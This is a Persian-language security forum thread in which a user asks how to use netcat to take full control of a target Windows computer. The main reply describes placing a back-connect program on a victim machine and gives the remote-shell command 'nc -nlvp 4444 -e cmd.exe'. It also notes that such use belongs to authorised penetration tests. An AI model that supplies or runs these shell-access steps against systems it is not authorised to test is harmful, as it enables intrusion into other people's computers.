رفتن به مطلب

برنامه ی nc


 اشتراک گذاری

ارسال های توصیه شده

درود دوستان

اگر در مکان مناسبی تایپک ایجاد نکردم معذرت میخوام و از مدیران خواهش میکنم انتقال بدن

سوال من این که این میشه با برنامه ی nc یا همونnetcat دسترسی کامل به سیستم تارگت داشت؟

یعنی میخوام تمام درایو ها/دکستاپ و ... تارگت رو در اختیار داشته باشم(در محیط ویندوز)

اگر میشه لطفا اموزش کامل رو بزارید....در ضمن در انجمن سرچ کردم اما تنها دستوراتش موجود بود

با تشکر فراوان

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

ی help یا -h بنویس فک کنم دستور هارو میاره

برای دسترسی ب فایلها از دستور shell استفاده کن

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

ابتدا ممنونم از این دوست که جواب دادن

بعد دستورات رو دارم و میخواستم ببینم آیا میشه برا نفوذ استفاده کرد

منظور شما از shell این دستور یا نه؟؟

nc -s "ip" "port

اگر اشتباهه لطفا کامل راهنمایی کنید

ممنونم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

منظورتو از نفوذ نفهمیدم

ولی این pdf رو بخون شاید سوالت حل شد :)

https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

منظورم از نفوذ دسترسی کامل به سیستم تارگت مثلا دسترسی به درایو ها دکستاپ و...

ولی قبل از این که به سوالم پاسخ بدید بگین که اصلا امکان نفوذ به استفاده از این برنامه یعنی برنامه ی nc هست یا نه؟؟

اگر میشه با استفاده از این برنامه نفوذ کرد روش نفوذ رو آموزش بدین لطفا...

میدونم که با استفاده از nc میشه پورت های باز تارگت رو اسکن کرد...مثلا اگر پورت 135 تارگت باز باشه چه طوری میشه به سیستمش اتک داد...

و یه سوال دیگه،آیا فایروال و یا آنتی ویروس میوتنه از از دادن با پورت جلوگیری کنه؟؟

لطفا یه کم ساده بیان کنید تا متوجه بشم

بسیار ممنون

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

والا من تا حالا از نت کت فقط برا بک کانکت گرفتن از سرور استفاده کردم

یبارم برا ریموت از اتیج فرایت استفاده کردم ک جواب نداد

منتظر جواب اساتید باش

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

منظورم از نفوذ دسترسی کامل به سیستم تارگت مثلا دسترسی به درایو ها دکستاپ و...

ولی قبل از این که به سوالم پاسخ بدید بگین که اصلا امکان نفوذ به استفاده از این برنامه یعنی برنامه ی nc هست یا نه؟؟

اگر میشه با استفاده از این برنامه نفوذ کرد روش نفوذ رو آموزش بدین لطفا...

میدونم که با استفاده از nc میشه پورت های باز تارگت رو اسکن کرد...مثلا اگر پورت 135 تارگت باز باشه چه طوری میشه به سیستمش اتک داد...

و یه سوال دیگه،آیا فایروال و یا آنتی ویروس میوتنه از از دادن با پورت جلوگیری کنه؟؟

لطفا یه کم ساده بیان کنید تا متوجه بشم

بسیار ممنون

سلام.

سوال شما کلی هست و جوانب این برنامه رو اصلا در نظر نگرفتین.

برنامه نت کت یه برنامه اتصال شبکه هست و شما با این برنامه هر کاری میتونید بکنید.

برای ینکه بتونید این برنامه رو برای حمله به سیستم قربانی به اجرا بگذارین ابتدا باید یک بک کنکت بسیازید.

خوب این بک کانکت چیکار میکنه.

این برنامه ابتدا باید به یک پورت لوکال ( مثلا 4444 ) متصل بشه

ولی چون اینکار رو باید بر روی سیستم هدف انجام داده بشه بک کانکت ما باید به صورتی تنظیم بشه که اینکار و خودکار انجام بده.

خوب حالا بالفرض ما اینکار رو انجام دادیم.چی میشه؟

با اینکار ما به صفحه Command prompt یا همون CِMD سیستم قربانی متصل میشیم.

خوب حالا این مراحل رو عملی تست میکنیم.

فایل BackConnect.exe رو در نظر بگیرید.

این همون بک کانکنت ماست که باید با پورتی که توسط بک کانکنت تنظیم شده ( یعنی همون پورت 4444 ) مچ بشه ( تنظیم بشه )

خوب حالا نفوذگر باید اون پورت خاص رو Listen کنه تا بهش وصل بشه.

به این شکل:

nc -nlvp 4444 -e cmd.exe

خوب با اینکار به پورت موردنظر و بک کانکت ما وصل میشه و طبق گفته بالا به صفحه Command prompt یا همون CMD وصل میشه.

این بود طریق شل گرفتن از سیستم قربانی با استفاده از ابزار Netcat (معروف به چاقوی دوسره سوئیسی)

نکته دیگری هم هست.واز این ابزار معمولا در تست نفوذ در شرایطی که سیستم هدف باخبر هست انجام میشه.بهترین راه استفاده از متا و آرمیتیج هست.

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شرکت گاردایران

پردازشگران ایمن داده ي آدلان

شماره ثبت: 9438

شبکه های اجتماعی

 

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
  • اضافه کردن...

اطلاعات مهم

فعالیت شما در این انجمن به منزله تایید قوانین انجمن میباشد! شرایط استفاده